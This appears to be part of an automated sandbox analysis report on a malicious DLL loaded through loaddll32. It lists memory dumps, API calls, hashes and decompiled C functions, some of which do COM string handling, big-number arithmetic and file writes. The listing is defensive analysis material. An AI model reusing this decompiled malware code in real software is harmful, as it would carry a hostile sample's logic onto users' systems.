                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                • String ID:
                • API String ID: 1730969706-0
                • Opcode ID: 8fc0cba10e8f0b1cb18de619de207fc36ea44c540a73f27e704f40f1e5ed6088
                • Instruction ID: a014bca5af8dbde6a5187c3a9ec80af5bca36123c8a59a12468c6110d87b2e0d
                • Opcode Fuzzy Hash: 8fc0cba10e8f0b1cb18de619de207fc36ea44c540a73f27e704f40f1e5ed6088
                • Instruction Fuzzy Hash: B071F871D0020AEFCF10DFE5D8949AEBBB9FF48314B1085ADE915AB250E735A941CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C167CF Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                Download Yara Rule
                APIs
                • SysAllocString.OLEAUT32(?), ref: 01C16810
                • SysFreeString.OLEAUT32(?), ref: 01C168F3
                  • Part of subcall function 01C11079: SysAllocString.OLEAUT32(01C192B0), ref: 01C110C9
                • SafeArrayDestroy.OLEAUT32(?), ref: 01C16947
                • SysFreeString.OLEAUT32(?), ref: 01C16955
                  • Part of subcall function 01C1309D: Sleep.KERNEL32(000001F4), ref: 01C130E5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$AllocFree$ArrayDestroySafeSleep
                • String ID:
                • API String ID: 3193056040-0
                • Opcode ID: 49ea75ac89e75a374869e967bb67448ee6b43a460893e8e25a33e592936e6385
                • Instruction ID: cfaa51f092333c86cb5719d1d5d1ff3d545c76ab57f75b418289ec71eae54426
                • Opcode Fuzzy Hash: 49ea75ac89e75a374869e967bb67448ee6b43a460893e8e25a33e592936e6385
                • Instruction Fuzzy Hash: D851737294029AEFDB00DFE8C8849EEB7B6FF89300B188868E645DB214D771DD45DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11079 Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E01C11079(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x1c1a2d8; // 0x55d5a8
					_t5 = _t102 + 0x1c1b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x1c192b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x1c1a2d8; // 0x55d5a8
												_t28 = _t108 + 0x1c1b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x1c1a2d8; // 0x55d5a8
														_t33 = _t78 + 0x1c1b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                0x01c1107e
                0x01c11087
                0x01c11088
                0x01c1108c
                0x01c11092
                0x01c11098
                0x01c110a1
                0x01c110a7
                0x01c110b1
                0x01c110b3
                0x01c110b9
                0x01c110be
                0x01c110c9
                0x01c110d1
                0x01c110d4
                0x01c111f7
                0x01c110da
                0x01c110da
                0x01c110e7
                0x01c110ed
                0x01c110f3
                0x01c110f7
                0x01c110fd
                0x01c1110a
                0x01c1110e
                0x01c11114
                0x01c11117
                0x01c1111d
                0x01c11123
                0x01c11129
                0x01c1112c
                0x01c1112f
                0x01c11135
                0x01c1113e
                0x01c11144
                0x01c11145
                0x01c11148
                0x01c11149
                0x01c1114a
                0x01c11152
                0x01c11153
                0x01c11154
                0x01c11156
                0x01c1115a
                0x01c1115e
                0x00000000
                0x00000000
                0x01c11164
                0x01c1116d
                0x01c11173
                0x01c1117d
                0x01c11181
                0x01c11183
                0x01c11190
                0x01c11194
                0x01c1119c
                0x01c111a1
                0x01c111b3
                0x01c111b5
                0x01c111bb
                0x01c111bb
                0x01c111c4
                0x01c111c4
                0x01c111c6
                0x01c111cc
                0x01c111cc
                0x01c111cf
                0x01c111d5
                0x01c111d8
                0x01c111e1
                0x00000000
                0x00000000
                0x00000000
                0x01c111e1
                0x01c11135
                0x01c1112f
                0x01c11117
                0x01c111e7
                0x01c111e7
                0x01c111ed
                0x01c111ed
                0x01c111f3
                0x01c111f3
                0x01c111fc
                0x01c11202
                0x01c11202
                0x01c110be
                0x01c1120b

                APIs
                • SysAllocString.OLEAUT32(01C192B0), ref: 01C110C9
                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 01C111AB
                • SysFreeString.OLEAUT32(00000000), ref: 01C111C4
                • SysFreeString.OLEAUT32(?), ref: 01C111F3
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$Free$Alloclstrcmp
                • String ID:
                • API String ID: 1885612795-0
                • Opcode ID: 5b393e7668c9423685cc9d409b21d7ff23692719e163d07245fe477e157c0d9e
                • Instruction ID: 31eaedbb341158589c4a360e01f78cc3d4bccfa16a6417522bbbd4b15e2177f1
                • Opcode Fuzzy Hash: 5b393e7668c9423685cc9d409b21d7ff23692719e163d07245fe477e157c0d9e
                • Instruction Fuzzy Hash: 75513C75D0051ADFCB01DFE8C8889AEF7B5FF8A704B244594EA15AB214D735DE01DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C158DD Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E01C158DD(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E01C14BA2(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E01C1367D(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01C15ED7(_t101,  &_v428, _a8, _t96 - _t81);
					E01C15ED7(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E01C1367D(_t101, 0x1c1a188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E01C1367D(_a16, _a4);
						E01C1635B(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L01C1807C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L01C18076();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E01C165C1(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E01C11D9B(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E01C153CD(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x1c1a188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                0x01c158e0
                0x01c158ec
                0x01c158f2
                0x01c158f7
                0x01c158fb
                0x01c15a6d
                0x01c15a71
                0x01c15a71
                0x01c15901
                0x01c15905
                0x01c1590b
                0x01c1590c
                0x01c15917
                0x01c1591d
                0x01c15922
                0x01c15925
                0x01c1593f
                0x01c1594e
                0x01c1595a
                0x01c15964
                0x01c15969
                0x01c1596b
                0x01c1596e
                0x01c15a25
                0x01c15a2b
                0x01c15a3c
                0x01c15a4f
                0x01c15a65
                0x00000000
                0x01c15a6a
                0x01c15977
                0x01c1597e
                0x01c15982
                0x01c15988
                0x01c1598a
                0x01c1598c
                0x01c1598e
                0x01c15990
                0x01c1599a
                0x01c1599f
                0x01c159a1
                0x01c159a3
                0x01c159a4
                0x01c159a5
                0x01c159a6
                0x01c159ad
                0x01c159b4
                0x01c159b7
                0x01c159b7
                0x01c15984
                0x01c15984
                0x01c15984
                0x01c159bf
                0x01c159c7
                0x01c159d3
                0x01c159d8
                0x01c159d8
                0x01c159dd
                0x00000000
                0x00000000
                0x01c159df
                0x01c159e2
                0x01c159ef
                0x00000000
                0x00000000
                0x01c159f1
                0x01c159f1
                0x01c159fe
                0x01c159d8
                0x01c159dd
                0x00000000
                0x00000000
                0x00000000
                0x01c159dd
                0x01c15a08
                0x01c15a0b
                0x01c15a0e
                0x01c15a15
                0x01c15a15
                0x01c15a22
                0x00000000
                0x01c15a22
                0x01c1590e
                0x01c15912
                0x01c15913
                0x01c15915
                0x00000000
                0x00000000
                0x00000000
                0x01c15915
                0x00000000

                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 01C15990
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 01C159A6
                • memset.NTDLL ref: 01C15A4F
                • memset.NTDLL ref: 01C15A65
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: b7bf7b54d5ee7539941a6460b6c16c4a03cd3c9c8c0b7f051229a3ff18cbf98a
                • Instruction ID: 1b56bc61e202d44dc299568dbba782d7b9e8d0244221a83333026437448edd87
                • Opcode Fuzzy Hash: b7bf7b54d5ee7539941a6460b6c16c4a03cd3c9c8c0b7f051229a3ff18cbf98a
                • Instruction Fuzzy Hash: 2241D332A4021AEFDF109F68CC80BEE7765EF97720F104569B909A7284DB70DE45EB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CA667 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                Download Yara Rule
                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 046CA71A
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 046CA730
                • memset.NTDLL ref: 046CA7D9
                • memset.NTDLL ref: 046CA7EF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: d6519d2f77efdca02007d3192b903978d4c5f135882cba8783bbb0b0eacceda8
                • Instruction ID: 38439f9531ba096dd5f82857f36c5ad9365e513218d9c16d96fe2bac7fd5a528
                • Opcode Fuzzy Hash: d6519d2f77efdca02007d3192b903978d4c5f135882cba8783bbb0b0eacceda8
                • Instruction Fuzzy Hash: 9B418F31A01219ABEB10DFA9CC84BFE77B5EF45314F00456DA959A7280FB70BE448B91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D9DAA Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(00000000), ref: 046E592F
                • GetLastError.KERNEL32 ref: 046E594F
                  • Part of subcall function 046C2A41: wcstombs.NTDLL ref: 046C2AFF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWaitwcstombs
                • String ID:
                • API String ID: 2344289193-0
                • Opcode ID: 18d56c2bf5a6313d5b09104377f988868cddd9536895862cd169c9fb78c6ea86
                • Instruction ID: fed9b1924e75b7b4cad32c72e7f31908e5fd5b9831545e9f5eedbd38e3c649a0
                • Opcode Fuzzy Hash: 18d56c2bf5a6313d5b09104377f988868cddd9536895862cd169c9fb78c6ea86
                • Instruction Fuzzy Hash: 11413670901259FFDF109FE6C8889FEBBF9EB14358B10446AE602E7250F734AA41DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D007B Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                Download Yara Rule
                APIs
                • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 046D0095
                • StrChrA.SHLWAPI(?,0000005C), ref: 046D00BC
                • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 046D00E2
                • lstrcpy.KERNEL32(?,?), ref: 046D0186
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpylstrcpyn
                • String ID:
                • API String ID: 4154805583-0
                • Opcode ID: 1da68b088e3f6e454c439b965ab96059a290d7560518e9de5a9c9f98df2a0437
                • Instruction ID: e2327593759d76808536d74433be93b69251e054b4bb1787b04a18b08437277f
                • Opcode Fuzzy Hash: 1da68b088e3f6e454c439b965ab96059a290d7560518e9de5a9c9f98df2a0437
                • Instruction Fuzzy Hash: EF416C72900219BFDB119FA5CD84DEEBBFCEB09354F0480A6E901E7251E774EA44CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D76B9 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: _strupr
                • String ID:
                • API String ID: 3408778250-0
                • Opcode ID: a1d3c1e047fe672a63fef4d0fe2ccf3fd8e4c8597280a9f550386595a5ef7945
                • Instruction ID: ce59cc4d48833edfe017393c8777945769bfe56c0cb1880508c138ff18c76d2c
                • Opcode Fuzzy Hash: a1d3c1e047fe672a63fef4d0fe2ccf3fd8e4c8597280a9f550386595a5ef7945
                • Instruction Fuzzy Hash: CB418671D0020A9EEB21EF69C884AFEB7F8EF54349F504825E825D6250F734F945CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C6371 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C7554: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,046C567E), ref: 046C7560
                  • Part of subcall function 046C7554: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000), ref: 046C75BE
                  • Part of subcall function 046C7554: lstrcpy.KERNEL32(00000000,74E48170), ref: 046C75CE
                • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 046C63C0
                • wsprintfA.USER32 ref: 046C63F0
                • GetLastError.KERNEL32 ref: 046C6465
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                • String ID: `
                • API String ID: 324226357-1850852036
                • Opcode ID: a6c3efdd9e2ccaab303c35560ec6ba1bf89c43d9671c7a95d40dd95a7c40470f
                • Instruction ID: b8c7b8b9d09fb8a413ed00caf3fc5889a576b7f8bd2bf1fdc4f3ea510ed9e7bc
                • Opcode Fuzzy Hash: a6c3efdd9e2ccaab303c35560ec6ba1bf89c43d9671c7a95d40dd95a7c40470f
                • Instruction Fuzzy Hash: 3B31A07150030AAFDB11EF65DC84AAA7BE9EF54355F10C02EF91596250FB70F9148BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DEDBB Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D17C3: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 046D17D1
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DEE23
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046DEE72
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                  • Part of subcall function 046E36FE: GetLastError.KERNEL32 ref: 046E3749
                  • Part of subcall function 046E36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                  • Part of subcall function 046E36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                  • Part of subcall function 046E36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                  • Part of subcall function 046E36FE: SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                  • Part of subcall function 046E36FE: CloseHandle.KERNEL32(00000006), ref: 046E37F1
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,046D6D4E,?,?,?,?,?,?), ref: 046DEEA7
                • HeapFree.KERNEL32(00000000,?,?,?,?,046D6D4E,?,?,?,?,?,?,00000000,?,00000000), ref: 046DEEB7
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                • String ID:
                • API String ID: 4200334623-0
                • Opcode ID: 9354580de3c45a31b366cc0088c53892cb505e7fb3257c268eaadb7d6f1180a2
                • Instruction ID: 5c3c939d7b49bfdc2b22468072a5eda8523feaed18b00e0d75bf30dcd0685173
                • Opcode Fuzzy Hash: 9354580de3c45a31b366cc0088c53892cb505e7fb3257c268eaadb7d6f1180a2
                • Instruction Fuzzy Hash: 30311876910119FFEB10DFA5DC88CAABBBEFB48354B100469F504EB250E772AE51DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D6453 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                Download Yara Rule
                APIs
                • TlsGetValue.KERNEL32(?), ref: 046D6482
                • SetEvent.KERNEL32(?), ref: 046D64CC
                • TlsSetValue.KERNEL32(00000001), ref: 046D6506
                • TlsSetValue.KERNEL32(00000000), ref: 046D6522
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Value$Event
                • String ID:
                • API String ID: 3803239005-0
                • Opcode ID: 65f7520c3f9cff51acecf0f9087912d8c423aca5171033441389e5ab1cd169c0
                • Instruction ID: c9453fa036ebd832cee86ef17a55f4acc5739d491c292cabd07ee30917327ec5
                • Opcode Fuzzy Hash: 65f7520c3f9cff51acecf0f9087912d8c423aca5171033441389e5ab1cd169c0
                • Instruction Fuzzy Hash: 64219031A00244AFDB319F5ADE849AA7BA6FF55350F104529F502DB660F372FC91DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C8676 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046C86CF
                • memcpy.NTDLL(00000018,?,?), ref: 046C86F8
                • RegisterWaitForSingleObject.KERNEL32(00000010,?,046DDFF1,00000000,000000FF,00000008), ref: 046C8737
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C874A
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                • String ID:
                • API String ID: 2780211928-0
                • Opcode ID: f0d0830e9b6040055ff705310841c050b2583b24dc1bfb8a77a49e34e7d0ff3a
                • Instruction ID: 2deb33b4ec90ca77251a4064989f42390fce6647263b1152a941bf4dfb78222a
                • Opcode Fuzzy Hash: f0d0830e9b6040055ff705310841c050b2583b24dc1bfb8a77a49e34e7d0ff3a
                • Instruction Fuzzy Hash: C0316170240306AFEB20EF16DC84BAA7BE9FF54320F104529F915D7290F775E9159BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C106C Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C215D: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,046C1089,?,?,?), ref: 046C2193
                  • Part of subcall function 046C215D: memset.NTDLL ref: 046C2209
                  • Part of subcall function 046C215D: memset.NTDLL ref: 046C221D
                • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 046C10C4
                • lstrcmpi.KERNEL32(00000000,?), ref: 046C10EB
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 046C1130
                • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 046C1141
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                • String ID:
                • API String ID: 1065503980-0
                • Opcode ID: 5c0a3144c97eedf2aa217b5467c446237f53a6dc9de51885eb3646267d3b063e
                • Instruction ID: 5cfe59488aa761df0051fd428a4ad0a156524072b3d83b3a3a0db0184e41b6f3
                • Opcode Fuzzy Hash: 5c0a3144c97eedf2aa217b5467c446237f53a6dc9de51885eb3646267d3b063e
                • Instruction Fuzzy Hash: 73216D35A00209FFEF10AFA1DC44EAE7BB9EB15258F004068E904AB651F739AE55DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C131C2 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E01C131C2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E01C12114(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                0x01c131ce
                0x01c131d2
                0x01c131d3
                0x01c131d4
                0x01c131d6
                0x01c131d8
                0x01c131dd
                0x01c131e0
                0x01c13277
                0x01c1327e
                0x01c1327e
                0x01c131e9
                0x01c131f0
